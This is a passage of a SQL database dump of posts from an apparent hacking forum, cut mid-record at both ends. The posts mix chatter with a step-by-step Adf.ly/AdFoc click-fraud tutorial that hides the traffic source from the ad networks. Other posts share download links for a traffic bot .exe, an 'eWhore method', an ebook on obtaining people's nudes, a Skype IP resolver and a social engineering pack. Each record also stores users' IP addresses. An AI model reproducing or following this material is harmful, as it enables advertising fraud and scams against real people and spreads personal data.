'0', '0'); INSERT INTO mybb_posts VALUES('5405', '959', '0', '9', 'How to make $50+ / Day with AdFoc or Adfly', '0', '62', 'R?????zo?', '1350594167', 'Hey guys,\r\n\r\nJust a quick 5 min tutorial on how to make $50 + a day with AdFoc / adfly cause I\'ve seen people using it a lot on my traffic exchange.\r\n\r\n1. If you\'re not already then sign up to AdFoc / Adfly\r\n\r\n2. Create some links (as many as you want, the more links the more money you make)\r\n\r\n3. Sign up to http://customhits.net/\r\n\r\n4. You start with 50 coins so go to \"Add Site\", select traffic exchange and fill in the boxes \"title\" \"link\" etc. Now when for the coins section type in how many coins you have and for CPC put the most you can.\r\n\r\n5. Now you will need to earn coins to be able to keep your links. To do this just go to earn coins - auto-surf. All you have to do is leave it running in another tab and you\'ll be earning coins. You can set this up to run 24/7 on a VPS\r\n\r\n6. To add more coins to your sites just go to My Sites - Your site - Add Coins and put in all of your coins\r\n\r\n7. I made $25 doing this yesterday with only 3 links submitted. If I had 6 submitted I would of made $50. \r\n\r\nThis is all good however AdFoc / Adfly will notice where all your hits are coming from so you will need to upgrade to VIP which lets you use anonymous source [all advertisers safe] traffic and they will never know!\r\n\r\nI hope you like this guide!', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '7c3c6e2062b8de5319d94f20002beca9', '0', '0'); INSERT INTO mybb_posts VALUES('5406', '947', '5404', '8', 'RE: GANGNAM STYLE', '0', '257', 'XxTREYZxX', '1350594213', '[quote=\'iTzIpod\' pid=\'5404\' dateline=\'1350594166\']\r\nAyeee Sexy Lady\r\n\r\nOoop\r\nOoop\r\nOoop\r\nOppa\r\nGangnam Style.\r\n[/quote]\r\n\r\nahahah every one now op op op op op gangnam style>', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', 'e9cce736c9bda1d1630fbd8bc9d49d1b', '0', '0'); INSERT INTO mybb_posts VALUES('5407', '937', '5258', '19', 'RE: Nude Bot- Mr. Do you want to fap?', '0', '82', 'iTzIpod', '1350594227', 'Where is the link or whatever?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e1fa384404b1a71b14a6dcfbca1df553', '0', '0'); INSERT INTO mybb_posts VALUES('5408', '959', '5405', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '257', 'XxTREYZxX', '1350594268', 'nice tutorial it really helped me :O', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', 'eff3fdd5009bcc638aaebef567e4dc4d', '0', '0'); INSERT INTO mybb_posts VALUES('5409', '943', '5401', '74', 'RE: MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '257', 'XxTREYZxX', '1350594323', '[quote=\'iTzIpod\' pid=\'5401\' dateline=\'1350594124\']\r\nI want a MC account :3 xD I already have one. But I got a friend that is being cheap and won\'t buy one from me. So I\'ll give him this one for free.\r\n[/quote]\r\n\r\npm me please .thanks :O', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', 'b75d1a8cf4a308f63c628e82c1e6482a', '0', '0'); INSERT INTO mybb_posts VALUES('5410', '960', '0', '61', '[24-7 Traffic Bot] Adf.ly | Adfoc.us | LinkBucks | Traffic Exchange | All in One Bot!', '0', '62', 'R?????zo?', '1350594377', '[align=center][img]http://i.imgur.com/ne7k6.png[/img]\r\n\r\n[img]http://i.imgur.com/sXB98.png[/img]\r\n\r\nDOWNLOAD: http://dl.dropbox.com/u/11776598/247Installer.exe\r\n\r\n\r\n[b]TERMS AND CONDITIONS[/b]\r\n1) You will not, and cannot re-distribute my bot under a survey link at all!\r\n2) No clamming this bot as your own creation. Seriously, whos gonna believe you?\r\n3) Just dont do anything stupid. Thanks\r\n\r\n[b]Virus Scan: [/b] https://www.virustotal.com/file/b557fe3b7be0ecc59d1b79cac7cee68a0389ebc49d812e99f70aaf9c34d88211/analysis/1349572839/\r\n\r\n[b]Information:[/b]\r\n\r\nDesigned, and created by 0BliVi0N. This bot is everything, but ordinary! Instead of just delivering views, and hits. It delivers them NON STOP 24-7, and you can get link clicks for adf.ly, linkbucks, adcrun.ch, and more! All it takes is a simple download. And the requirements met. Created in 2011, this was saught to be the best traffic bot. But was discontinued, for new ideas, and further upgraded. Now that its back in action and ready to roll, with ALL NEW FEATURES! This bot can take on the competition, and crush it! All it needs, is your help...\r\n\r\n\r\nSupported Websites:\r\nAdf.ly\r\nAdchrun.ch\r\nLinkBucks\r\nAdfoc.us\r\n\r\nFeatures:\r\n24-7 View Delivery\r\nAuto Start Setting\r\nAuto Login Setting\r\nMozilla & IE Browsers\r\nLink Clicking (adf.ly, linkbucks, etc)\r\nManaging your URLs\r\nSettings for only 24 hour link clicking\r\nReferrals\r\nTraffic Exchanges\r\n& MORE!\r\n\r\nSystem Requirements:\r\n1GB of RAM\r\nWindows 7/Vista/XP\r\n.NET Framework 4.0\r\n[/align]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '020f6d3c12aa3737b2cbbbc3dee62d91', '0', '0'); INSERT INTO mybb_posts VALUES('5411', '945', '5288', '7', 'RE: I dont want.......', '0', '82', 'iTzIpod', '1350594418', 'We only bent the rule a little bit.\nThat was only to improve LH\'s activity.\nBut we got enough posts for now.\nSo we should report any threads with a PM me for download or whatsoever now.\n\nThat\'s my opinion of the story.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f2822f6f945ecd2733e0a4338e46d5f0', '0', '0'); INSERT INTO mybb_posts VALUES('5412', '953', '5367', '34', 'RE: | [ Newbie Guide ] Photoshop Site\'s For Beginners | [ Very Helpful ] |', '0', '82', 'iTzIpod', '1350594460', 'I knew most of these websites.\nAlthough nice share :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '75003e46a8f3967a36439ac095f943fd', '0', '0'); INSERT INTO mybb_posts VALUES('5413', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '257', 'XxTREYZxX', '1350594461', 'we still need more though, because im so active i get bored with no new post :)', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', 'e61e08566c7937a6f8fa539f8f6d9340', '0', '0'); INSERT INTO mybb_posts VALUES('5414', '945', '5411', '7', 'RE: I dont want.......', '0', '257', 'XxTREYZxX', '1350594527', '[quote=\'iTzIpod\' pid=\'5411\' dateline=\'1350594418\']\r\nWe only bent the rule a little bit.\r\nThat was only to improve LH\'s activity.\r\nBut we got enough posts for now.\r\nSo we should report any threads with a PM me for download or whatsoever now.\r\n\r\nThat\'s my opinion of the story.\r\n[/quote]\r\n\r\nagreed, this guy knows what he is talking about :)', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '06e97703ea42db8a938273b96ff014b7', '0', '0'); INSERT INTO mybb_posts VALUES('5415', '928', '5194', '49', 'RE: MOTM', '0', '82', 'iTzIpod', '1350594534', 'Apathy, you\'re just too inactive. You need to post more.\nAll everyone asks from you.\n\nAs for the thread,\nI think we should do this. And a LH Weekly News Series.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c8e5aa2a1749502f681da5aac4fc32cb', '0', '0'); INSERT INTO mybb_posts VALUES('5416', '950', '5349', '35', 'RE: Which theme do you like better?', '0', '82', 'iTzIpod', '1350594591', 'I like the 2nd one :) Nice job', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '30aba379ba5091ad43400456476d4d7b', '0', '0'); INSERT INTO mybb_posts VALUES('5417', '928', '5194', '49', 'RE: MOTM', '0', '62', 'R?????zo?', '1350594626', 'I think we should do this, MOTM sounds awesome :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'f1d5e48637c0bdcdd3b5c6be05224ec6', '0', '0'); INSERT INTO mybb_posts VALUES('5418', '952', '5366', '34', 'RE: A nice clean signature tutorial', '0', '82', 'iTzIpod', '1350594626', 'No he did not.\n\nBut this is very nice! I like the background.\n:)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ead44690488916f720e660b96644317d', '0', '0'); INSERT INTO mybb_posts VALUES('5419', '953', '5367', '34', 'RE: | [ Newbie Guide ] Photoshop Site\'s For Beginners | [ Very Helpful ] |', '0', '62', 'R?????zo?', '1350594694', 'Nice list, I didn\'t knew most of them :o', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '56c26ee35259a4b705fe4d8b3fedf43f', '0', '0'); INSERT INTO mybb_posts VALUES('5420', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '82', 'iTzIpod', '1350594703', 'I approve this idea.\nBut I have no experience xP\n\nGood luck.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '08e2dc803a66596811180f24e346a723', '0', '0'); INSERT INTO mybb_posts VALUES('5421', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1350594754', 'http://l33thacking.net/thread-321.html', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4185af3d98ddbd6e98d2b5505de73dc9', '0', '0'); INSERT INTO mybb_posts VALUES('5422', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '62', 'R?????zo?', '1350594785', '[video=youtube]http://www.youtube.com/watch?v=oIMXL-B_Ax4[/video]\r\n\r\nJust thought I\'d share this.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '11dfe15596c9c9dd00e4b085330c1c90', '0', '0'); INSERT INTO mybb_posts VALUES('5423', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '257', 'XxTREYZxX', '1350594844', 'ahah thanks for this LOL\'d video :O', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', 'a6b79e1ed55db0bc008b87e0e0a3e8de', '0', '0'); INSERT INTO mybb_posts VALUES('5424', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '82', 'iTzIpod', '1350594882', 'He didn\'t download it.\nI didn\'t download it.\n\nI don\'t know how to download it.\nI can\'t seem to download it.\n\nThis is 1.3.1\n\nMC Current Version is 1.3.2', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '53841e5f03a2856f2280cf35ad908118', '0', '0'); INSERT INTO mybb_posts VALUES('5425', '961', '0', '61', '??$$[CAN NEVER BE SATURATED] How To Earn $50\\Week! ??', '0', '62', 'R?????zo?', '1350594919', 'About:\r\nThis eBook will show you a way to make money, and it can never get saturated, and you will never stop earning!\r\n\r\nLink: http://www.mediafire.com/view/?awvgv5aiay2vrw5', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '92a57e40ba9e7f7dfe311d556635de12', '0', '0'); INSERT INTO mybb_posts VALUES('5426', '954', '5371', '35', 'RE: /\\ New Signature | Rate My Graphics !!! /\\', '0', '82', 'iTzIpod', '1350594923', 'Looks alright. Kinda \"blurry\" I guess.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ba735c4bc61647fb47fe11af383560f5', '0', '0'); INSERT INTO mybb_posts VALUES('5427', '962', '0', '61', '$100/month Ebook', '0', '62', 'R?????zo?', '1350595031', 'You can possibly make $100/month with this eBook. Hope you all enjoy it! \r\n\r\nDownload Link: http://www.mediafire.com/?aw67m3cy1y3yy5a', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9bbe261fda9bc76a67b10ecb589e5d3a', '0', '0'); INSERT INTO mybb_posts VALUES('5428', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '257', 'XxTREYZxX', '1350595039', 'its on the minecraft map download website and then press download :O', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 'd84a515935f98d6b9d76b99077b0e311', '0', '0'); INSERT INTO mybb_posts VALUES('5429', '321', '1502', '34', 'RE: Full Signature Tutorial', '0', '82', 'iTzIpod', '1350595088', 'Good luck!\n\nThanks everyone for the support.\nI should make more threads. But I don\'t have the time.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1002bde65485f9be2beb73a4420b03f9', '0', '0'); INSERT INTO mybb_posts VALUES('5430', '963', '0', '17', '??SIEGRIED\'S EWHORE METHOD ??', '0', '62', 'R?????zo?', '1350595119', '[align=center]\r\n[img]i.imgur.com/uHA8n.jpg[/img]\r\n\r\nDownload: http://dl.dropbox.com/u/57540058/SIEG.FRIED\'S%20EWHORE%20METHOD.zip[/align]', '94.132.244.168', '1585771688', '1', '0', '62', '1350858070', '1', '888f9b9474dfb038b27b950253269d1b', '0', '1350858070'); INSERT INTO mybb_posts VALUES('5431', '321', '1502', '34', 'RE: Full Signature Tutorial', '0', '257', 'XxTREYZxX', '1350595171', 'pm\'ed you :)\nand you should make more threads try get time because they are great:)', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', '7100a6fce1bf142b3aef7adba35ac192', '0', '0'); INSERT INTO mybb_posts VALUES('5432', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '82', 'iTzIpod', '1350595172', 'Are you still a noob?\n\nI just asked you to fix your grammar and spelling :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f48986e900e37b0f0c02950905128d67', '0', '0'); INSERT INTO mybb_posts VALUES('5433', '964', '0', '19', '[Junk][UPDATED] L33T Hacking Skype Resolver', '0', '214', 'Rave™', '1350595218', '[b] Yes I am back. New source, new API, now working.\r\nEnjoy! [/b]\r\n\r\nhttp://raveresolver.tk', '71.67.179.16', '1195619088', '1', '0', '214', '1350595230', '1', 'accd1db1e3695fef333e251a17b55bda', '0', '1350595230'); INSERT INTO mybb_posts VALUES('5434', '496', '2408', '14', 'RE: Free Proxy List', '0', '82', 'iTzIpod', '1350595243', 'The list is right there in the thread.\n\n\nIf you\'re talking about the bot, okay then. Ask t3h jok3r. Or PM him.\n\nSearch LH for threads on Adf.ly Bots.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '63a12da2eae11952e7acd26f91ca9f1f', '0', '0'); INSERT INTO mybb_posts VALUES('5435', '959', '5405', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '82', 'iTzIpod', '1350595297', 'I know the creator of Customhits.net :3\n\n\n\nVery nice method. Tried it. Didn\'t work :p Lool', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '47b88ee627227cfe4a7bc04c90dc5ead', '0', '0'); INSERT INTO mybb_posts VALUES('5436', '943', '5283', '74', 'RE: MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '82', 'iTzIpod', '1350595327', 'You PMed me already. Thank you for the account. Didn\'t work though.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4fd087ce1058210e4d254bff03781819', '0', '0'); INSERT INTO mybb_posts VALUES('5437', '964', '5433', '19', 'RE: [UPDATED] L33T Hacking Skype Resolver', '0', '62', 'R?????zo?', '1350595342', 'Looks great, thanks for this bro :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '391d660dc3e395af79cad9ce1d5c5e2f', '0', '0'); INSERT INTO mybb_posts VALUES('5438', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '257', 'XxTREYZxX', '1350595343', 'not really my grammar and spelling isn\'t to bad :)', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '6752adc245d7fbda2d69ecb837bfea4b', '0', '0'); INSERT INTO mybb_posts VALUES('5439', '965', '0', '61', '?Free Unlimited Battlefield 3 Limited Edition Codes?', '0', '62', 'R?????zo?', '1350595450', 'Title: How to get unlimited battlefield 3 limited edition codes\r\nAuthor: Dr. Brony and Myself\r\nPages: 2 and a bit :P\r\nDescription: In this Ebook it will show you step by step on how to get unlimited battlefield 3 limited edition codes :P.\r\nThis method does not involve the following:\r\n1. PPC (Pay per Click) Marketing ex. Google AdSense or AdBrite\r\n2. CPA (Cost per Action) Marketing ex. AdScendMedia or CPALead\r\n3. SCPA (Secondary Cost per Action) Marketing ex. Share!Cash or File!Ice\r\n4. GPT (Get paid To) Marketing ex. PrizeRebel or Rewards1\r\n5. You do not have to build any websites, write any articles, or anything!\r\n6. Keylogging or any type of RATing.\r\n\r\nDownload here: http://www.mediafire.com/view/?jxwzyua9r507va3', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '2d183f14131e77f621e0f42f4e22f53d', '0', '0'); INSERT INTO mybb_posts VALUES('5440', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '62', 'R?????zo?', '1350595490', 'Thanks for this, great giveaway :D', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0467f7c56c5d8db7435cc83b8bf03ee9', '0', '0'); INSERT INTO mybb_posts VALUES('5441', '966', '0', '61', '[99$] Lots of money for anything FAST! [LEAKED]', '0', '62', 'R?????zo?', '1350595588', 'Site:\r\n\r\nhttp://www.anything-fast.com/\r\n\r\nDownload:\r\n\r\nhttp://www.mediafire.com/file/s3c8jzszc7t6ml7/FastMoney.pdf', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '046d05a3773bb1ddd6f8a2da2bb0c96c', '0', '0'); INSERT INTO mybb_posts VALUES('5442', '943', '5436', '74', 'RE: MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '257', 'XxTREYZxX', '1350595676', '[quote=\'iTzIpod\' pid=\'5436\' dateline=\'1350595327\']\r\nYou PMed me already. Thank you for the account. Didn\'t work though.\r\n[/quote]\r\n\r\nit does try again :O\r\ni just tried it and it worked :)', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '58d161d97bc32b8dbb0fccbc68b40804', '0', '0'); INSERT INTO mybb_posts VALUES('5443', '967', '0', '9', '[Free]Awesome Monetizing, and SEO eBooks Collections [Free]WORTH 1000$', '0', '62', 'R?????zo?', '1350595699', '[b][align=center]Hello Guys\n\nI have some Great Monetizing eBooks collection, These all are based on money making and SEO methods.\n\nSome books are bought by me and some are public but i can guarantee you , every method is work as fuck .\n\ndont belive me Grab your copy and find yourself.\n\nProofs :\n\n[img]http://i.imgur.com/qppCe.jpg[/img]\n\n[img]http://i.imgur.com/6lZSM.jpg[/img]\n\n[img]http://i.imgur.com/1GhYM.jpg[/img]\n\n[img]http://i.imgur.com/vAAN9.jpg[/img]\n\nDownload Link :\n\nhttp://www.mediafire.com/download.php?x9cphq1n8gpma3d\n\n [/align][/b]', '94.132.244.168', '1585771688', '1', '0', '62', '1350595710', '1', 'fe53fffc9b75fd9ea1b530276d29dc41', '0', '1350595710'); INSERT INTO mybb_posts VALUES('5444', '968', '0', '61', '[Ebook] [HOT] Get Any Girls Nudes You Want [HOT] [Ebook]', '0', '62', 'R?????zo?', '1350595749', 'Hope you guys like it for all you horny fellas out there!\r\n\r\nLink: \r\nhttp://www.sendspace.com/file/qjef5c', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6ccf64090874422efe93f28f6031dc9b', '0', '0'); INSERT INTO mybb_posts VALUES('5445', '967', '5443', '9', 'RE: [Free]Awesome Monetizing, and SEO eBooks Collections [Free]WORTH 1000$', '0', '257', 'XxTREYZxX', '1350595797', 'thanks for the share :O\nappreciated :)', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', 'ea99689cfb5a3ac458dc466715a5b548', '0', '0'); INSERT INTO mybb_posts VALUES('5446', '952', '5372', '34', 'RE: A nice clean signature tutorial', '0', '2', 'Apathy', '1350595813', '[quote=\'VirtualLegend\' pid=\'5372\' dateline=\'1350573171\']\r\nNice Tutorial, but did you make it yourself?\r\n[/quote]\r\nNope I have credits on the bottom.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '7709f09775f4dde9e7a35b0112112824', '0', '0'); INSERT INTO mybb_posts VALUES('5447', '969', '0', '9', 'UNSATURATED Method - Start Earning Money NOW on 75% AUTOPILOT - $50-100 Per DAY', '0', '62', 'R?????zo?', '1350595842', '[align=center][size=xx-large][color=#FF0000]I\'m About To Show You How I Made Up To $100.00 Per DAY! This Worked While At SCHOOL And WORK!\n[/color][/size]\nUpdate: handing out up to 4 vouch copies to high quality members. Post here if your interested!\n\nHave you ever wanted to make money while your busy? Whether you plan on buying a new gaming account, items, or services or even something online? Would you like to start making $50.00 - $100.00 per day on top of school, work, and other extracurricular activities? Are you ready to try a money making eBook which actually works?\nIf you answered true to any of these questions, your in luck. With this method I was able to rake in a whopping $100.00 daily, on top of working a 9-5. I earn a measly $60.00 per day while working, while using this method I increased this to $160.00 per day! For each time I was being paid by my real job I made an extra $1000.00 every two weeks! This guide goes into complete detail (A total of 13 Pages). After reading this, you\'ll have an easy time comprehending just how easy this method is. \nBy following my set by step procedure, you aren\'t going to make a fortune, you probably won\'t start earning a full income, but you CAN make up to $3000.00 per month.\n\nIf you\'re ready to start making automated money right now, send $10.00 as a gift to skoomesh@hotmail.com and PM me here with your transaction ID for the download link and password\n\nWhat You Need:\n1. Up to an hour one day one.\n2. Additional time on each additional day, about 30 minutes.\n3. A PayPal account\n\nThis eBook Is Not For:\n1. People who think 0 effort will yield results.\n2. People who can\'t put in the minuscule effort.\n4. People without the ability to use their PCs frequently.\n\nIf You Want To Buy:\n1. Send $10.00 gift to skoomesh@hotmail.com\n2. PM me on here with your transaction details.\n3. If I do not get back to you within 24 Hours, email me. \n\nSome More Info:\n1. This will work from anywhere as long as you have a PC with an internet connection. \n2. This eBook does not contain PTC, CPA, eBay, PPD, etc.\n3. You can start with $0.00 down.\n4. You can start earning money today. \n\nToS:\nBuy purchasing this eBook you, the buyer, agree to the following. All payments will be done from via PayPal. All sales of this eBook are final, including charge backs. After paying you will receive the guide at a maximum of 48 hours after payment has been sent, if you file a dispute before this period of time you will be reported and dealt with accordingly. \n\neBook Price:\n$10.00\n\nPayment Proof:\n[img]http://www.pixentral.com/pics/1jt6RlpmM5SoK9nWKPIJMemGJrwV2H.png[/img][/align]\n\n[url=https://www.virustotal.com/file/06fe5e4842a6d6d8e50de501bb069bfcf99ea7de78354e064ec8f9eb07c53d5d/analysis/1349002792/]VScan[/url]\n[url=http://www.mediafire.com/view/?yg4fckbuhy7w9ww][size=large]DOWNLOAD[/size][/url]\n\ncredits: SNUCK1994', '94.132.244.168', '1585771688', '1', '0', '62', '1350595880', '1', 'f021e14f9ba58640594bf21ca4f62488', '0', '1350595880'); INSERT INTO mybb_posts VALUES('5448', '970', '0', '61', 'Free Premium Ebook Bundle', '0', '62', 'R?????zo?', '1350595970', 'This Ebook bundle comes with 8 unique tuts! This is brought to you for free! All the cost is a thank you below. Thanks!\r\n\r\nDownload Link:\r\nhttp://www.mediafire.com/?cdvp3r69rk5yt', '94.132.244.168', '1585771688', '1', '0', '62', '1350596645', '1', '2420eacdc16ff97d42f78774a9f0e1a8', '0', '1350596645'); INSERT INTO mybb_posts VALUES('5449', '971', '0', '9', 'EASY $250 EACH DAY | \"The Webmaster Method\" | Instant paypal money, no wait', '0', '62', 'R?????zo?', '1350596153', '[ALIGN=CENTER][img]http://i.minus.com/ibnksuPktPo82p.png[/img]\n\nDownload link: http://www.sendspace.com/file/37ca53[/ALIGN]', '94.132.244.168', '1585771688', '1', '0', '62', '1350597535', '1', 'ce659c43bee565419aff7e5d972638e7', '0', '1350597535'); INSERT INTO mybb_posts VALUES('5450', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '62', 'R?????zo?', '1350596243', 'your welcome, I laugh my ass off too :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c5b26653f9bbf9a3abfda934a9e6985b', '0', '0'); INSERT INTO mybb_posts VALUES('5451', '969', '5447', '9', 'RE: UNSATURATED Method - Start Earning Money NOW on 75% AUTOPILOT - $50-100 Per DAY', '0', '228', 'VirtualLegend', '1350596353', 'Awesome Share, Keep it up !!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'ceb0936303b5a2ceeddc6ccb21dc0c51', '0', '0'); INSERT INTO mybb_posts VALUES('5452', '947', '5450', '8', 'RE: GANGNAM STYLE', '0', '257', 'XxTREYZxX', '1350596364', '[quote=\'R?????zo?\' pid=\'5450\' dateline=\'1350596243\']\r\nyour welcome, I laugh my ass off too :P\r\n[/quote]\r\n\r\nyeah i bet he is racking up fame everytime he does that dance lol', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', 'bcd7818581c224889e1a5c51c38927e5', '0', '0'); INSERT INTO mybb_posts VALUES('5453', '972', '0', '16', 'Social Engineering Package', '0', '62', 'R?????zo?', '1350596435', 'Here\'s Social Engineering Package I received a while ago.\n\nHope you all find it useful. \n\nDownload Here: http://www.4shared.com/rar/3ra6LaBK/Defcons_Social_Engineering_Pac.html\n\nPreview: \n[img]http://gyazo.com/4c04ecdc6e66f33f6643ed16c146cbee.png[/img]', '94.132.244.168', '1585771688', '1', '0', '62', '1350596455', '1', '590d3018adf394c80b36b9ff556e0f7c', '0', '1350596455'); INSERT INTO mybb_posts VALUES('5454', '973', '0', '19', '[Junk]New HF Logo?', '0', '214', 'Rave™', '1350596533', 'I think this should be I made it.\r\nhttp://adf.ly/Diq4b', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '2fd93707832aba334de8bbe8483207d3', '0', '0'); INSERT INTO mybb_posts VALUES('5455', '974', '0', '61', 'Get Abs Sitting at your Computer in 2 weeks!', '0', '62', 'R?????zo?', '1350596609', 'No idea if this actually works but it\'s a paid ebook.\r\n\r\nhttps://dl.dropbox.com/u/70931930/Abs%202%20Weeks%20Updated.pdf', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '12129dfef8ad30d197eb6ca7684a760b', '0', '0'); INSERT INTO mybb_posts VALUES('5456', '975', '0', '7', 'how do i insert a pic', '0', '257', 'XxTREYZxX', '1350596627', 'hey i was just wondering how do i post a pic :)', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '1c75a226e91577a6355cb29110fc6064', '0', '0'); INSERT INTO mybb_posts VALUES('5457', '973', '5454', '19', 'RE: New HF Logo?', '0', '62', 'R?????zo?', '1350596845', 'That\'s disgusting. ewwwww', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9e89cabffb829bc9e4a4044651247a03', '0', '0'); INSERT INTO mybb_posts VALUES('5458', '975', '5456', '7', 'RE: how do i insert a pic', '0', '62', 'R?????zo?', '1350596919', 'use this \n\n[code]\n[img]pic link goes here[/img]\n[/code]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'aad62713c57b81973ffc549995254a43', '0', '0'); INSERT INTO mybb_posts VALUES('5459', '976', '0', '71', 'Halo 4', '0', '257', 'XxTREYZxX', '1350596963', 'halo 4 is on its way if you havent checked out the trailer check it out here:www.youtube.com/watch?v=nsWyP0LBikI\r\nwho\'s going to get it :O', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '5dcd2c4ee6ff14d21a674cc9c1f61e8d', '0', '0'); INSERT INTO mybb_posts VALUES('5460', '977', '0', '14', '[FREE] VPN Every 24 Hours [FREE]', '0', '62', 'R?????zo?', '1350596999', 'Hey have you ever wanted your own free premium vpn?\r\nWell look at this site:\r\nhttp://incloak.com/premium/demo/\r\n\r\nyou can get a 24 hour key code to have a vpn!\r\n\r\nThis vpn inculdes many countries as:\r\n\r\nRussia (Moscow, Sankt-Peterburg, Saratov)\r\nUSA (California)\r\nCanada (Montrea)\r\nGermany (Frankfurt, Nurnberg)\r\nEngland (Worcester)\r\nUkraine (Kharkov)\r\nItaly (Marco)\r\nSweden (Falkenberg)\r\nVietnam (Ho Chi Minh)\r\nHong Kong (Central)\r\nNetherlands (Amsterdam)\r\nPoland (Gdansk)\r\nEstonia (Tallinn)\r\nHungary (Budapest)\r\nLuxembourg (Steinsel)\r\nFrance (Paris)\r\nSwitzerland (Zurich\r\nAustria (Graz\r\nLatvia (Riga)\r\nRandom server\r\n~Alot more~\r\n\r\nWorks great if your activating out of country steam keys!\r\n\r\n-How to use-\r\nOk after you got your key and download the folder from here: \r\nhttp://incloak.com/vpn/\r\n\r\nopen it and you will see 3 different files they match the OS you are running if you are running Windows take out the windows folder and put it on your deckstop.\r\nAfter that download a program called openvpn from [hide]http://swupdate.open...vpn-connect.msi[/hide]\r\nafter you got that program downloaded install it, once installed open the program\'s folder and find the config folder in openvpn.\r\nOnce done copy all the files in the folder you got from incloak into your openvpn config folder, like this:\r\n\r\n[img]http://i40.tinypic.com/be6hq9.jpg[/img]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1b5a98a38ffac481c6f88af2ae095c16', '0', '0'); INSERT INTO mybb_posts VALUES('5461', '978', '0', '73', 'IOS vs ANDROID', '0', '257', 'XxTREYZxX', '1350597127', 'title says it all im interested whats going to win LOL', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 'ed644a0ff021eae432e7b054709d6e14', '0', '0'); INSERT INTO mybb_posts VALUES('5462', '979', '0', '14', '4200 Checked HTTP Proxy Servers (L1/L2/L3)', '0', '62', 'R?????zo?', '1350597128', 'Here you go:\r\n\r\nhttp://pastebin.com/p13pjTeR', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0739ef1dd01787b9e59bcc0729545e92', '0', '0'); INSERT INTO mybb_posts VALUES('5463', '975', '5458', '7', 'RE: how do i insert a pic', '0', '257', 'XxTREYZxX', '1350597200', '[quote=\'R?????zo?\' pid=\'5458\' dateline=\'1350596919\']\r\nuse this \r\n\r\n[code]\r\n[img]pic link goes here[/img]\r\n[/code]\r\n[/quote]\r\n\r\nyeah but it says too many characters to every pic i choose LOL', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '1388d1a9aee37b3ebd5895dbd6d29fa3', '0', '0'); INSERT INTO mybb_posts VALUES('5464', '967', '5443', '9', 'RE: [Free]Awesome Monetizing, and SEO eBooks Collections [Free]WORTH 1000$', '0', '228', 'VirtualLegend', '1350597230', 'Already have them, there are a few good methods', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '21b6277c07193507f0ccc595ced7f886', '0', '0'); INSERT INTO mybb_posts VALUES('5465', '971', '5449', '9', 'RE: EASY $250 EACH DAY | \"The Webmaster Method\" | Instant paypal money, no wait', '0', '228', 'VirtualLegend', '1350597296', 'Nice Thread, \nTip; Center it in the middle (Looks way more better ;) )', '83.83.167.183', '1397991351', '1', '0', 